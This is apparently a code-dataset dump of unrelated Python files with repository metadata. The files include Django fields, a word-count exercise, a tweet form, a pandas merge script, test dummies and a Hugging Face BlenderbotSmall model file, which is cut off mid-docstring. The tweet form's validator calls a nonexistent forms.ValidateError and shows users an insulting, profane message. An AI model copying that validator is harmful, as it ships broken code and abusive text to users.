def from_db_value(self, value, expression, connection):
try:
validate_email(value)
except ValidationError:
return None
return value.lower()
class VoicePartField(CharField):
def from_db_value(self, value, expression, connection):
part_map = {
'tenor': 'tenor',
'lead': 'lead',
'baritone': 'baritone',
'bass': 'bass',
}
try:
return part_map[value.lower().strip()]
except AttributeError:
return None
except KeyError:
return None
class ReasonableBirthDate(DateField):
def from_db_value(self, value, expression, connection):
if value == date(1900, 1, 1) or value == date(2018, 11, 13):
return None
return value
class GenderField(CharField):
def from_db_value(self, value, expression, connection):
gender_map = {
'men': 'male',
'women': 'female',
'mixed': 'mixed',
}
try:
return gender_map[value.lower()]
except AttributeError:
return None
except KeyError:
return None
@deconstructible
class ImageUploadPath(object):
def __init__(self, name):
self.name = name
def __call__(self, instance, filename):
return os.path.join(
instance._meta.app_label,
instance._meta.model_name,
self.name,
str(instance.id),
)
class NoPunctuationCharField(CharField):
def from_db_value(self, value, expression, connection):
if not value:
return ""
return value.translate(
value.maketrans('', '', '!"#$%&()*+,./:;<=>?@[\\]^_`{|}~')
).strip()
class TimezoneField(serializers.Field):
def to_representation(self, obj):
return six.text_type(obj)
def to_internal_value(self, data):
try:
return pytz.timezone(str(data))
except pytz.exceptions.UnknownTimeZoneError:
raise ValidationError('Unknown timezone')
| [
"dbinetti@gmail.com"
] | dbinetti@gmail.com |
a737f00847838c5d50695751bc37fa22764d4575 | 835db5ec0fc127df1de58a9a3af4a869a1a7cd84 | /assignments/strings/word_count.py | fc5dd5e977ac303db00540d29a365b626279f30b | [] | no_license | thorhilduranna/2020-3-T-111-PROG | 3ba097e1b54d68bdd6efbf1d7f90911a9336fa5a | c9758b61256aa6e39a3308e576c8ad0bf2b6d027 | refs/heads/master | 2023-02-09T23:39:22.879653 | 2021-01-07T12:59:19 | 2021-01-07T12:59:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | a_str = input("Input a string: ")
inside_word = False
no_of_words = 0
no_of_letters = 0
for char in a_str:
if char.isalpha() or char.isdigit():
no_of_letters += 1
if not inside_word:
no_of_words += 1
inside_word = True
else:
inside_word = False
print("No. of letters {}, no. of words: {}".format(no_of_letters, no_of_words))
| [
"hrafnl@gmail.com"
] | hrafnl@gmail.com |
a2ce63face177225a9ae85576b4b6a7d69f8158e | 457a71c31c5bb992616bc2c8067817436c416784 | /src/teewtme/tweets/forms.py | 8dc47f94a55be3f0ebcf51740d42dfd2d3f6e57e | [] | no_license | mahmoudzeyada/tweetme | 9a7f15e9b1c3d0d4054637ac8ad5581a0a5ee825 | 00c046b96d40061e192990b9bae76998e8f46319 | refs/heads/master | 2020-04-10T04:17:13.130415 | 2019-04-29T01:17:28 | 2019-04-29T01:17:28 | 160,793,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 676 | py | from django import forms
from .models import Tweet
from django.contrib.auth import get_user_model
class TweetModelForm (forms.ModelForm):
content = forms.CharField(required=False,label="",
widget=forms.Textarea(
attrs={'placeholder':"your tweet",
"class":"form-control"}
))
class Meta:
model=Tweet
fields=['content']
def clean_content(self,*args,**kwargs):
content = self.cleaned_data.get("content")
if content=="bitch":
raise forms.ValidateError("you r the fqin bitch")
return content
| [
"mahmoudzeyada440@gmail.com"
] | mahmoudzeyada440@gmail.com |
bf533929e72d3e88457deb66a33be5a79bd0fc16 | bce3601042879a059bf878a9d7972967432fc154 | /scripts/DA_join_apps_rfcd_seos_2.py | 1c60d205c037784111dcff3a28881aad218f95e7 | [] | no_license | diegoami/DSRetreat_Melbourne_DIOLEM | 8aa49d0f178651af9f0c3ed23c0155790b205160 | 7e4df7a48f650360d3e34c700e17a84b1f7511b1 | refs/heads/master | 2021-07-08T08:55:56.580343 | 2017-10-06T23:02:07 | 2017-10-07T18:11:25 | 105,751,935 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,445 | py | import pandas as pd
seo_train = pd.read_csv('../data/train_seo_mod.csv')
rfcd_train = pd.read_csv('../data/train_rfcd_mod.csv')
app_train = pd.read_csv('../data/train_apps_mod.csv')
seo_test = pd.read_csv('../data/test_seo_mod.csv')
rfcd_test = pd.read_csv('../data/test_rfcd_mod.csv')
app_test = pd.read_csv('../data/test_apps_mod.csv')
def generate_table(seo, rfcd, app):
rfcd_pivoted = rfcd.pivot(index='id', columns='RFCD.Code', values='RFCD.Percentage').fillna(0)
seo_pivoted = seo.pivot(index='id', columns='SEO.Code', values='SEO.Percentage').fillna(0)
rfcd_pivoted.rename(columns=lambda x: "RFCD_" + str(x), inplace=True)
seo_pivoted.rename(columns=lambda x: "SEO_" + str(x), inplace=True)
app_rfcd = app.join(rfcd_pivoted, how='left').fillna(0)
app_rfcd_seo = app_rfcd.join(seo_pivoted, how='left').fillna(0)
app_rfcd_seo['RFCD_OTHER'] = 100 - app_rfcd_seo[
[x for x in app_rfcd_seo.columns if x.startswith('RFCD')]].sum(axis=1)
app_rfcd_seo['SEO_OTHER'] = 100 - app_rfcd_seo[
[x for x in app_rfcd_seo.columns if x.startswith('SEO')]].sum(axis=1)
app_rfcd_seo.set_index('id', inplace=True)
return app_rfcd_seo
app_rfcd_seo_train = generate_table(seo_train, rfcd_train, app_train)
app_rfcd_seo_train.to_csv('../data/train_apps_rfcd_seo_mod.csv')
app_rfcd_seo_test = generate_table(seo_test, rfcd_test, app_test)
app_rfcd_seo_test.to_csv('../data/test_apps_rfcd_seo_mod.csv')
| [
"diego.amicabile@gmail.com"
] | diego.amicabile@gmail.com |
59e4b2564ddea552ed9897307d3df7b9d25bb025 | dd3bbd4e7aaee7a8a5f26b927ce28ac472c855a5 | /eggs/collective.monkeypatcher-1.0.1-py2.7.egg/collective/monkeypatcher/tests/dummypatch.py | f9a09150452fd23fb7a4f27b88e58122d022afb5 | [] | no_license | nacho22martin/tesis | ea0a822f8bdbdef6f13f41276ecd4d6e85427ca5 | e137eb6225cc5e724bee74a892567796166134ac | refs/heads/master | 2020-12-24T13:20:58.334839 | 2013-11-09T12:42:41 | 2013-11-09T12:42:41 | 14,261,570 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 907 | py | # -*- coding: utf-8
# $Id: dummypatch.py 84132 2009-04-12 21:13:03Z glenfant $
"""Class, function and patch for test cases"""
class Dummy(object):
"""As said"""
def someMethod(self):
"""someMethod docstring"""
return"original"
def patchedMethod(self):
"""patchedMethod docstring"""
return "patched"
def someFunction(value):
"""someFunction docstring"""
return value
def patchedFunction(value):
"""patchedFunction docstring"""
return value * 2
class Foo(object):
"""As said"""
def someFooMethod(self):
return "fooMethod result"
def patchedFooMethod(self):
return "patchedFooMethod result"
def my_appy_patch(scope, original, replacement):
setattr(scope, original, replacement)
return
all_patches = []
def monkeyPatchHandler(event):
"""Fake handler"""
global all_patches
all_patches.append(event)
return
| [
"ignacio@plone.(none)"
] | ignacio@plone.(none) |
cb81bed189406073d2dd70cd655ed560a290f09f | 1f886c4ba2bd9b440da96e67f1f07d11d1a7bebc | /jsoncomment/wrapper.py | 32af3ee60e114cdbef9e127b1061647892f4203c | [] | no_license | halfbrained/cuda_spell_checker | c9c56db7f9d0b61839e37da67dab1498cdbb1911 | bee0ac8a3481e92424488bcde0e7fd2020341819 | refs/heads/master | 2023-03-16T11:23:49.375473 | 2021-03-07T20:22:22 | 2021-03-07T20:22:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 985 | py |
################################################################################
from types import ModuleType
################################################################################
# A Class to simulate dynamic inheritance
# Allows to change behaviour of multiple modules or classes, with the same
# interface
# Note: Class wrapping only partially tested
class GenericWrapper:
# object_to_wrap can be:
# A Module
# A Class Instance
def __init__(self, object_to_wrap):
self.object_to_wrap = object_to_wrap
if isinstance(object_to_wrap, ModuleType):
self._lookup = lambda name : self.object_to_wrap.__dict__[name]
elif isinstance(object_to_wrap, object):
self._lookup = self.object_to_wrap.__getattr__
else:
raise TypeError("Expected a Module or a Class Instance")
# Fallback lookup for undefined methods
def __getattr__(self, name):
return self._lookup(name)
################################################################################
| [
"support@uvviewsoft.com"
] | support@uvviewsoft.com |
dabb39f9ba1d0bfc87c5bf1f2da1b479cbee8b42 | c46754b9600a12df4f9d7a6320dfc19aa96b1e1d | /src/transformers/models/blenderbot_small/modeling_blenderbot_small.py | dc2f1512ffe6922f5639e767f70dc2d58c8daba1 | [
"Apache-2.0"
] | permissive | huggingface/transformers | ccd52a0d7c59e5f13205f32fd96f55743ebc8814 | 4fa0aff21ee083d0197a898cdf17ff476fae2ac3 | refs/heads/main | 2023-09-05T19:47:38.981127 | 2023-09-05T19:21:33 | 2023-09-05T19:21:33 | 155,220,641 | 102,193 | 22,284 | Apache-2.0 | 2023-09-14T20:44:49 | 2018-10-29T13:56:00 | Python | UTF-8 | Python | false | false | 76,130 | py | # coding=utf-8
# Copyright 2021 The Facebook, Inc. and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch BlenderbotSmall model."""
import copy
import math
from typing import List, Optional, Tuple, Union
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import CrossEntropyLoss
from ...activations import ACT2FN
from ...modeling_outputs import (
BaseModelOutput,
BaseModelOutputWithPastAndCrossAttentions,
CausalLMOutputWithCrossAttentions,
Seq2SeqLMOutput,
Seq2SeqModelOutput,
)
from ...modeling_utils import PreTrainedModel
from ...utils import (
add_end_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_blenderbot_small import BlenderbotSmallConfig
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "BlenderbotSmallConfig"
BLENDERBOT_SMALL_PRETRAINED_MODEL_ARCHIVE_LIST = [
"facebook/blenderbot_small-90M",
# See all BlenderbotSmall models at https://huggingface.co/models?filter=blenderbot_small
]
# Copied from transformers.models.bart.modeling_bart.shift_tokens_right
def shift_tokens_right(input_ids: torch.Tensor, pad_token_id: int, decoder_start_token_id: int):
"""
Shift input ids one token to the right.
"""
shifted_input_ids = input_ids.new_zeros(input_ids.shape)
shifted_input_ids[:, 1:] = input_ids[:, :-1].clone()
shifted_input_ids[:, 0] = decoder_start_token_id
if pad_token_id is None:
raise ValueError("self.model.config.pad_token_id has to be defined.")
# replace possible -100 values in labels by `pad_token_id`
shifted_input_ids.masked_fill_(shifted_input_ids == -100, pad_token_id)
return shifted_input_ids
# Copied from transformers.models.bart.modeling_bart._make_causal_mask
def _make_causal_mask(
input_ids_shape: torch.Size, dtype: torch.dtype, device: torch.device, past_key_values_length: int = 0
):
"""
Make causal mask used for bi-directional self-attention.
"""
bsz, tgt_len = input_ids_shape
mask = torch.full((tgt_len, tgt_len), torch.finfo(dtype).min, device=device)
mask_cond = torch.arange(mask.size(-1), device=device)
mask.masked_fill_(mask_cond < (mask_cond + 1).view(mask.size(-1), 1), 0)
mask = mask.to(dtype)
if past_key_values_length > 0:
mask = torch.cat([torch.zeros(tgt_len, past_key_values_length, dtype=dtype, device=device), mask], dim=-1)
return mask[None, None, :, :].expand(bsz, 1, tgt_len, tgt_len + past_key_values_length)
# Copied from transformers.models.bart.modeling_bart._expand_mask
def _expand_mask(mask: torch.Tensor, dtype: torch.dtype, tgt_len: Optional[int] = None):
"""
Expands attention_mask from `[bsz, seq_len]` to `[bsz, 1, tgt_seq_len, src_seq_len]`.
"""
bsz, src_len = mask.size()
tgt_len = tgt_len if tgt_len is not None else src_len
expanded_mask = mask[:, None, None, :].expand(bsz, 1, tgt_len, src_len).to(dtype)
inverted_mask = 1.0 - expanded_mask
return inverted_mask.masked_fill(inverted_mask.to(torch.bool), torch.finfo(dtype).min)
# Copied from transformers.models.blenderbot.modeling_blenderbot.BlenderbotLearnedPositionalEmbedding with Blenderbot->BlenderbotSmall
class BlenderbotSmallLearnedPositionalEmbedding(nn.Embedding):
"""
This module learns positional embeddings up to a fixed maximum size.
"""
def __init__(self, num_embeddings: int, embedding_dim: int):
super().__init__(num_embeddings, embedding_dim)
def forward(self, input_ids_shape: torch.Size, past_key_values_length: int = 0):
"""`input_ids_shape` is expected to be [bsz x seqlen]."""
bsz, seq_len = input_ids_shape[:2]
positions = torch.arange(
past_key_values_length, past_key_values_length + seq_len, dtype=torch.long, device=self.weight.device
)
return super().forward(positions)
# Copied from transformers.models.bart.modeling_bart.BartAttention with Bart->BlenderbotSmall
class BlenderbotSmallAttention(nn.Module):
"""Multi-headed attention from 'Attention Is All You Need' paper"""
def __init__(
self,
embed_dim: int,
num_heads: int,
dropout: float = 0.0,
is_decoder: bool = False,
bias: bool = True,
):
super().__init__()
self.embed_dim = embed_dim
self.num_heads = num_heads
self.dropout = dropout
self.head_dim = embed_dim // num_heads
if (self.head_dim * num_heads) != self.embed_dim:
raise ValueError(
f"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim}"
f" and `num_heads`: {num_heads})."
)
self.scaling = self.head_dim**-0.5
self.is_decoder = is_decoder
self.k_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.v_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.q_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
def _shape(self, tensor: torch.Tensor, seq_len: int, bsz: int):
return tensor.view(bsz, seq_len, self.num_heads, self.head_dim).transpose(1, 2).contiguous()
def forward(
self,
hidden_states: torch.Tensor,
key_value_states: Optional[torch.Tensor] = None,
past_key_value: Optional[Tuple[torch.Tensor]] = None,
attention_mask: Optional[torch.Tensor] = None,
layer_head_mask: Optional[torch.Tensor] = None,
output_attentions: bool = False,
) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]:
"""Input shape: Batch x Time x Channel"""
# if key_value_states are provided this layer is used as a cross-attention layer
# for the decoder
is_cross_attention = key_value_states is not None
bsz, tgt_len, _ = hidden_states.size()
# get query proj
query_states = self.q_proj(hidden_states) * self.scaling
# get key, value proj
# `past_key_value[0].shape[2] == key_value_states.shape[1]`
# is checking that the `sequence_length` of the `past_key_value` is the same as
# the provided `key_value_states` to support prefix tuning
if (
is_cross_attention
and past_key_value is not None
and past_key_value[0].shape[2] == key_value_states.shape[1]
):
# reuse k,v, cross_attentions
key_states = past_key_value[0]
value_states = past_key_value[1]
elif is_cross_attention:
# cross_attentions
key_states = self._shape(self.k_proj(key_value_states), -1, bsz)
value_states = self._shape(self.v_proj(key_value_states), -1, bsz)
elif past_key_value is not None:
# reuse k, v, self_attention
key_states = self._shape(self.k_proj(hidden_states), -1, bsz)
value_states = self._shape(self.v_proj(hidden_states), -1, bsz)
key_states = torch.cat([past_key_value[0], key_states], dim=2)
value_states = torch.cat([past_key_value[1], value_states], dim=2)
else:
# self_attention
key_states = self._shape(self.k_proj(hidden_states), -1, bsz)
value_states = self._shape(self.v_proj(hidden_states), -1, bsz)
if self.is_decoder:
# if cross_attention save Tuple(torch.Tensor, torch.Tensor) of all cross attention key/value_states.
# Further calls to cross_attention layer can then reuse all cross-attention
# key/value_states (first "if" case)
# if uni-directional self-attention (decoder) save Tuple(torch.Tensor, torch.Tensor) of
# all previous decoder key/value_states. Further calls to uni-directional self-attention
# can concat previous decoder key/value_states to current projected key/value_states (third "elif" case)
# if encoder bi-directional self-attention `past_key_value` is always `None`
past_key_value = (key_states, value_states)
proj_shape = (bsz * self.num_heads, -1, self.head_dim)
query_states = self._shape(query_states, tgt_len, bsz).view(*proj_shape)
key_states = key_states.reshape(*proj_shape)
value_states = value_states.reshape(*proj_shape)
src_len = key_states.size(1)
attn_weights = torch.bmm(query_states, key_states.transpose(1, 2))
if attn_weights.size() != (bsz * self.num_heads, tgt_len, src_len):
raise ValueError(
f"Attention weights should be of size {(bsz * self.num_heads, tgt_len, src_len)}, but is"
f" {attn_weights.size()}"
)
if attention_mask is not None:
if attention_mask.size() != (bsz, 1, tgt_len, src_len):
raise ValueError(
f"Attention mask should be of size {(bsz, 1, tgt_len, src_len)}, but is {attention_mask.size()}"
)
attn_weights = attn_weights.view(bsz, self.num_heads, tgt_len, src_len) + attention_mask
attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len)
attn_weights = nn.functional.softmax(attn_weights, dim=-1)
if layer_head_mask is not None:
if layer_head_mask.size() != (self.num_heads,):
raise ValueError(
f"Head mask for a single layer should be of size {(self.num_heads,)}, but is"
f" {layer_head_mask.size()}"
)
attn_weights = layer_head_mask.view(1, -1, 1, 1) * attn_weights.view(bsz, self.num_heads, tgt_len, src_len)
attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len)
if output_attentions:
# this operation is a bit awkward, but it's required to
# make sure that attn_weights keeps its gradient.
# In order to do so, attn_weights have to be reshaped
# twice and have to be reused in the following
attn_weights_reshaped = attn_weights.view(bsz, self.num_heads, tgt_len, src_len)
attn_weights = attn_weights_reshaped.view(bsz * self.num_heads, tgt_len, src_len)
else:
attn_weights_reshaped = None
attn_probs = nn.functional.dropout(attn_weights, p=self.dropout, training=self.training)
attn_output = torch.bmm(attn_probs, value_states)
if attn_output.size() != (bsz * self.num_heads, tgt_len, self.head_dim):
raise ValueError(
f"`attn_output` should be of size {(bsz * self.num_heads, tgt_len, self.head_dim)}, but is"
f" {attn_output.size()}"
)
attn_output = attn_output.view(bsz, self.num_heads, tgt_len, self.head_dim)
attn_output = attn_output.transpose(1, 2)
# Use the `embed_dim` from the config (stored in the class) rather than `hidden_state` because `attn_output` can be
# partitioned across GPUs when using tensor-parallelism.
attn_output = attn_output.reshape(bsz, tgt_len, self.embed_dim)
attn_output = self.out_proj(attn_output)
return attn_output, attn_weights_reshaped, past_key_value
# Copied from transformers.models.bart.modeling_bart.BartEncoderLayer with Bart->BlenderbotSmall
class BlenderbotSmallEncoderLayer(nn.Module):
def __init__(self, config: BlenderbotSmallConfig):
super().__init__()
self.embed_dim = config.d_model
self.self_attn = BlenderbotSmallAttention(
embed_dim=self.embed_dim,
num_heads=config.encoder_attention_heads,
dropout=config.attention_dropout,
)
self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)
self.dropout = config.dropout
self.activation_fn = ACT2FN[config.activation_function]
self.activation_dropout = config.activation_dropout
self.fc1 = nn.Linear(self.embed_dim, config.encoder_ffn_dim)
self.fc2 = nn.Linear(config.encoder_ffn_dim, self.embed_dim)
self.final_layer_norm = nn.LayerNorm(self.embed_dim)
def forward(
self,
hidden_states: torch.FloatTensor,
attention_mask: torch.FloatTensor,
layer_head_mask: torch.FloatTensor,
output_attentions: Optional[bool] = False,
) -> Tuple[torch.FloatTensor, Optional[torch.FloatTensor]]:
"""
Args:
hidden_states (`torch.FloatTensor`): input to the layer of shape `(batch, seq_len, embed_dim)`
attention_mask (`torch.FloatTensor`): attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
layer_head_mask (`torch.FloatTensor`): mask for attention heads in a given layer of size
`(encoder_attention_heads,)`.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under
returned tensors for more detail.
"""
residual = hidden_states
hidden_states, attn_weights, _ = self.self_attn(
hidden_states=hidden_states,
attention_mask=attention_mask,
layer_head_mask=layer_head_mask,
output_attentions=output_attentions,
)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
hidden_states = self.self_attn_layer_norm(hidden_states)
residual = hidden_states
hidden_states = self.activation_fn(self.fc1(hidden_states))
hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training)
hidden_states = self.fc2(hidden_states)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
hidden_states = self.final_layer_norm(hidden_states)
if hidden_states.dtype == torch.float16 and (
torch.isinf(hidden_states).any() or torch.isnan(hidden_states).any()
):
clamp_value = torch.finfo(hidden_states.dtype).max - 1000
hidden_states = torch.clamp(hidden_states, min=-clamp_value, max=clamp_value)
outputs = (hidden_states,)
if output_attentions:
outputs += (attn_weights,)
return outputs
# Copied from transformers.models.bart.modeling_bart.BartDecoderLayer with Bart->BlenderbotSmall
class BlenderbotSmallDecoderLayer(nn.Module):
def __init__(self, config: BlenderbotSmallConfig):
super().__init__()
self.embed_dim = config.d_model
self.self_attn = BlenderbotSmallAttention(
embed_dim=self.embed_dim,
num_heads=config.decoder_attention_heads,
dropout=config.attention_dropout,
is_decoder=True,
)
self.dropout = config.dropout
self.activation_fn = ACT2FN[config.activation_function]
self.activation_dropout = config.activation_dropout
self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)
self.encoder_attn = BlenderbotSmallAttention(
self.embed_dim,
config.decoder_attention_heads,
dropout=config.attention_dropout,
is_decoder=True,
)
self.encoder_attn_layer_norm = nn.LayerNorm(self.embed_dim)
self.fc1 = nn.Linear(self.embed_dim, config.decoder_ffn_dim)
self.fc2 = nn.Linear(config.decoder_ffn_dim, self.embed_dim)
self.final_layer_norm = nn.LayerNorm(self.embed_dim)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.Tensor] = None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.Tensor] = None,
layer_head_mask: Optional[torch.Tensor] = None,
cross_attn_layer_head_mask: Optional[torch.Tensor] = None,
past_key_value: Optional[Tuple[torch.Tensor]] = None,
output_attentions: Optional[bool] = False,
use_cache: Optional[bool] = True,
) -> Tuple[torch.FloatTensor, Optional[Tuple[torch.FloatTensor, torch.FloatTensor]]]:
"""
Args:
hidden_states (`torch.FloatTensor`): input to the layer of shape `(batch, seq_len, embed_dim)`
attention_mask (`torch.FloatTensor`): attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
encoder_hidden_states (`torch.FloatTensor`):
cross attention input to the layer of shape `(batch, seq_len, embed_dim)`
encoder_attention_mask (`torch.FloatTensor`): encoder attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
layer_head_mask (`torch.FloatTensor`): mask for attention heads in a given layer of size
`(encoder_attention_heads,)`.
cross_attn_layer_head_mask (`torch.FloatTensor`): mask for cross-attention heads in a given layer of
size `(decoder_attention_heads,)`.
past_key_value (`Tuple(torch.FloatTensor)`): cached past key and value projection states
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under
returned tensors for more detail.
"""
residual = hidden_states
# Self Attention
# decoder uni-directional self-attention cached key/values tuple is at positions 1,2
self_attn_past_key_value = past_key_value[:2] if past_key_value is not None else None
# add present self-attn cache to positions 1,2 of present_key_value tuple
hidden_states, self_attn_weights, present_key_value = self.self_attn(
hidden_states=hidden_states,
past_key_value=self_attn_past_key_value,
attention_mask=attention_mask,
layer_head_mask=layer_head_mask,
output_attentions=output_attentions,
)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
hidden_states = self.self_attn_layer_norm(hidden_states)
# Cross-Attention Block
cross_attn_present_key_value = None
cross_attn_weights = None
if encoder_hidden_states is not None:
residual = hidden_states
# cross_attn cached key/values tuple is at positions 3,4 of present_key_value tuple
cross_attn_past_key_value = past_key_value[-2:] if past_key_value is not None else None
hidden_states, cross_attn_weights, cross_attn_present_key_value = self.encoder_attn(
hidden_states=hidden_states,
key_value_states=encoder_hidden_states,
attention_mask=encoder_attention_mask,
layer_head_mask=cross_attn_layer_head_mask,
past_key_value=cross_attn_past_key_value,
output_attentions=output_attentions,
)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
hidden_states = self.encoder_attn_layer_norm(hidden_states)
# add cross-attn to positions 3,4 of present_key_value tuple
present_key_value = present_key_value + cross_attn_present_key_value
# Fully Connected
residual = hidden_states
hidden_states = self.activation_fn(self.fc1(hidden_states))
hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training)
hidden_states = self.fc2(hidden_states)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
hidden_states = self.final_layer_norm(hidden_states)
outputs = (hidden_states,)
if output_attentions:
outputs += (self_attn_weights, cross_attn_weights)
if use_cache:
outputs += (present_key_value,)
return outputs
class BlenderbotSmallPreTrainedModel(PreTrainedModel):
config_class = BlenderbotSmallConfig
base_model_prefix = "model"
supports_gradient_checkpointing = True
def _init_weights(self, module):
std = self.config.init_std
if isinstance(module, nn.Linear):
module.weight.data.normal_(mean=0.0, std=std)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=std)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
def _set_gradient_checkpointing(self, module, value=False):
if isinstance(module, (BlenderbotSmallDecoder, BlenderbotSmallEncoder)):
module.gradient_checkpointing = value
@property
def dummy_inputs(self):
pad_token = self.config.pad_token_id
input_ids = torch.tensor([[0, 6, 10, 4, 2], [0, 8, 12, 2, pad_token]], device=self.device)
dummy_inputs = {
"attention_mask": input_ids.ne(pad_token),
"input_ids": input_ids,
"decoder_input_ids": input_ids,
}
return dummy_inputs
BLENDERBOT_SMALL_START_DOCSTRING = r"""
This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass.
Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage
and behavior.
Parameters:
config ([`BlenderbotSmallConfig`]):
Model configuration class with all the parameters of the model. Initializing with a config file does not
load the weights associated with the model, only the configuration. Check out the
[`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
BLENDERBOT_SMALL_GENERATION_EXAMPLE = r"""
Conversation example:
```python
>>> from transformers import AutoTokenizer, BlenderbotSmallForConditionalGeneration
>>> mname = "facebook/blenderbot_small-90M"
>>> model = BlenderbotSmallForConditionalGeneration.from_pretrained(mname)
>>> tokenizer = AutoTokenizer.from_pretrained(mname)
>>> UTTERANCE = "My friends are cool but they eat too many carbs."
>>> print("Human: ", UTTERANCE)
Human: My friends are cool but they eat too many carbs.
>>> inputs = tokenizer([UTTERANCE], return_tensors="pt")
>>> reply_ids = model.generate(**inputs)
>>> print("Bot: ", tokenizer.batch_decode(reply_ids, skip_special_tokens=True)[0])
Bot: what kind of carbs do they eat? i don't know much about carbs.
>>> REPLY = "I'm not sure"
>>> print("Human: ", REPLY)
Human: I'm not sure
>>> NEXT_UTTERANCE = (
... "My friends are cool but they eat too many carbs.__end__ __start__what kind of carbs do they eat? "
... "i don't know much about carbs__end__ "
... "__start__ I'm not sure."
... )
>>> inputs = tokenizer([NEXT_UTTERANCE], return_tensors="pt")
>>> next_reply_ids = model.generate(**inputs)
>>> print("Bot: ", tokenizer.batch_decode(next_reply_ids, skip_special_tokens=True)[0])
Bot: they eat a lot of carbs. carbs are high in fat, protein, and fats.
```
"""
BLENDERBOT_SMALL_INPUTS_DOCSTRING = r"""
Args:
input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you provide
it.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
decoder_input_ids (`torch.LongTensor` of shape `(batch_size, target_sequence_length)`, *optional*):
Indices of decoder input sequence tokens in the vocabulary.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are decoder input IDs?](../glossary#decoder-input-ids)
BlenderbotSmall uses the `bos_token_id` as the starting token for `decoder_input_ids` generation. If
`past_key_values` is used, optionally only the last `decoder_input_ids` have to be input (see
`past_key_values`).
decoder_attention_mask (`torch.LongTensor` of shape `(batch_size, target_sequence_length)`, *optional*):
Default behavior: generate a tensor that ignores pad tokens in `decoder_input_ids`. Causal mask will also
be used by default.
head_mask (`torch.Tensor` of shape `(encoder_layers, encoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the attention modules in the encoder. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
decoder_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the attention modules in the decoder. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
cross_attn_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the cross-attention modules in the decoder. Mask values selected in `[0,
1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
encoder_outputs (`tuple(tuple(torch.FloatTensor)`, *optional*):
Tuple consists of (`last_hidden_state`, *optional*: `hidden_states`, *optional*: `attentions`)
`last_hidden_state` of shape `(batch_size, sequence_length, hidden_size)`, *optional*) is a sequence of
hidden-states at the output of the last layer of the encoder. Used in the cross-attention of the decoder.
past_key_values (`tuple(tuple(torch.FloatTensor))`, *optional*, returned when `use_cache=True` is passed or when `config.use_cache=True`):
